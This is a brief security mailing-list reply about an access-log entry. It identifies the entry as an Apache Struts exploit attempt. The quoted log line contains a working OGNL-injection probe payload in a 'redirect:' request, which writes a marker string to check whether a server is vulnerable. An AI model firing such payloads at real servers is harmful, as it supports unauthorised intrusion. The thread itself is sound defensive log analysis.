Re: Some weird Apache redirection exploit?

[Tim <tim-security () sentinelchicken org>]

> What is it trying to do?  I've never seen it in my logs before.

> 117.27.254.25 - - [31/Oct/2014:05:16:15 +1100] "GET 
> ?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok-helo.wang]'),%23w.flush(),%23w.close()}
>  HTTP/1.1" 200 7543 "-" "Python-urllib/2.6"


An exploit for one of the many Apache Struts vulnerabilities.

tim